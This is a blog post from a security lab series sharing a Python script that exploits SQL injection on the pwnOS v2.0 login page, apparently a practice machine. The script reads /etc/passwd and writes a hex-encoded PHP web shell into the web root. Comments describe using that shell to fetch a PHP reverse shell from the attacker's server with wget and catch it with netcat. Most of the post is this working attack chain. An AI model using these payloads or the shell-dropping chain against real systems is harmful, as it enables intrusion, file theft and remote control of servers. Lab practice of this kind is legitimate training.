Saturday, March 8, 2014

pwnOS v2.0 - Python Script that utilizes SQL Injection on Login

I wrote this python script to demonstrate SQL injection on pwnOS v2.0.  When it runs it will automate finding the username that the pwnOS database is running as, the displaying of the /etc/passwd file, and the creating of a simple-backdoor.php in the /var/www directory as sb.php.

The sql injection occurs on the login.php page of pwnOS v2.0 at /var/www/login.php.

#!/usr/bin/python

import socket
import os, sys

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.10.100', 80))

# Initial HTTP Request to obtain a PHP Session
httpRequest = "GET /index.php HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"

s.send(httpRequest)
data = s.recv(1024)

#Save the httpResponse to a file
f = open('temp.txt','w')
f.write(data)
f.close()

# Pull the PHPSESSID out of the file
with open("temp.txt") as file:
        for line in file:
                if 'PHPSESSID' in line:
                        sessionID = line[12:48]

s.recv(1024)

httpRequest = "POST /login.php HTTP/1.1\n"
httpRequest += "Host: 10.10.10.100\n"
httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0\n"
httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n"
httpRequest += "Accept-Language: en-US,en;q=0.5\n"
httpRequest += "Referer: http://10.10.10.100/login.php\n"
httpRequest += "Cookie: " + sessionID + "\n"
httpRequest += "Connection: keep-alive\n"
httpRequest += "Content-Type: application/x-www-form-urlencoded\n"

# For the query to find the user account that is running the database
# UNION SELECT 1,2,3,user(),5,6,7,8;-- -

# For the query to pull a file like the /etc/passwd
# Use the same process to display the passwords in /var/mysqli_connect.php
# UNION SELECT 1,2,3,load_file(/etc/passwd),5,6,7,8;-- -    # This does not work due to /etc/passwd needs to be hex encoded
# echo -n "/etc/passwd" | xxd -ps -                         # This from the command line will hex encode the file for us
# The following query will work to pull the /etc/passwd file from the file system
# UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8;-- -
# For the query to place the simple-backdoor.php in the /var/www/sb.php
# I used echo -n <of the simple-backdoor.php condensed to 1 line> | xxd -ps -
# UNION SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b206563686f20223c7072653e223b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d2824636d64293b206563686f20223c2f7072653e223b206469653b207d203f3e2055736167653a20687474703a2f2f7461726765742e636f6d2f73696d706c652d6261636b646f6f722e7068703f636d643d6361742b2f6574632f706173737764, 2, 3, 4, 5, 6, 7, 8 INTO OUTFILE '/var/www/sb.php'

# After the backdoor file exists you can use it to then copy a php-reverse-shell.php from /usr/share/webshells to /var/www/blog/config
# To do this you can:
(kali) # cd /usr/share/webshells/php/
(kali) # python -m SimpleHTTPServer   # Setup a listening webserver on port 8000 to pull the reverse shell from
# URL: http://10.10.10.100/sb.php?cmd=wget http://10.10.10.1:8000/php-reverse-shell.php -O /var/www/blog/config/reverse.php
# The config directory allows the www-data user to write to it
# Then on kali start listening on the port specified in the php-reverse-shell.php with ip of 10.10.10.1
(kali) # nc -lvp
# Then visit on the victim URL: http://10.10.10.100/config/blog/reverse.php
# This will also allow you to see /var/mysqli_config.php from a semi-shell

print "Select Query\n"
print "1. Pull user account that the database is running as\n"
print "2. Pull /etc/passwd File\n"
print "3. Drop php backdoor into /var/www/sb.php\n"
print "4. Custom Query\n"
query = raw_input('Select: ')

if query == '1':
        querySelected = "UNION SELECT 1,2,3,user(),5,6,7,8;-- -"
elif query == '2':
        querySelected = 'UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8;-- -'
elif query == '3':
        querySelected = "UNION SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b206563686f20223c7072653e223b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d2824636d64293b206563686f20223c2f7072653e223b206469653b207d203f3e2055736167653a20687474703a2f2f7461726765742e636f6d2f73696d706c652d6261636b646f6f722e7068703f636d643d6361742b2f6574632f706173737764, 2, 3, 4, 5, 6, 7, 8 INTO OUTFILE '/var/www/sb.php';-- -"
elif query == '4':
        querySelected = raw_input('Custom Query: ')

postInfo = "email=' " + querySelected + "&pass=thepcnerd&submit=Login&sumbitted=TRUE\n\n"
lengthPostInfo = len(postInfo)

httpRequest += "Content-Length: " + str(lengthPostInfo) + "\n\n"
httpRequest += postInfo

s.send(httpRequest)

if query == '1':
        data = s.recv(4096)
        #print data

        #Save the httpResponse to a file
        f = open('temp2.txt','w')
        f.write(data)

        f.close()

        # Pull the <h1> out of the file
        with open("temp2.txt") as file:
                for line in file:
                        if '<h1>' in line:
                                print line

elif query == '2':
        data = s.recv(4096)
        #print data

        #Save the httpResponse to a file
        f = open('temp2.txt','w')
        f.write(data)
        f.close()

        data = s.recv(4096)
        #print data

        #Save the httpResponse to a file
        f = open('temp2.txt','a')
        f.write(data)
        f.close()

        with open("temp2.txt") as file:
                for line in file:
                        print line

elif query == '3':
        data = s.recv(4096)
        print data

elif query == '4':
        data = s.recv(4096)
        print data
        data = s.recv(4096)

        print data


No comments:

Post a Comment

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...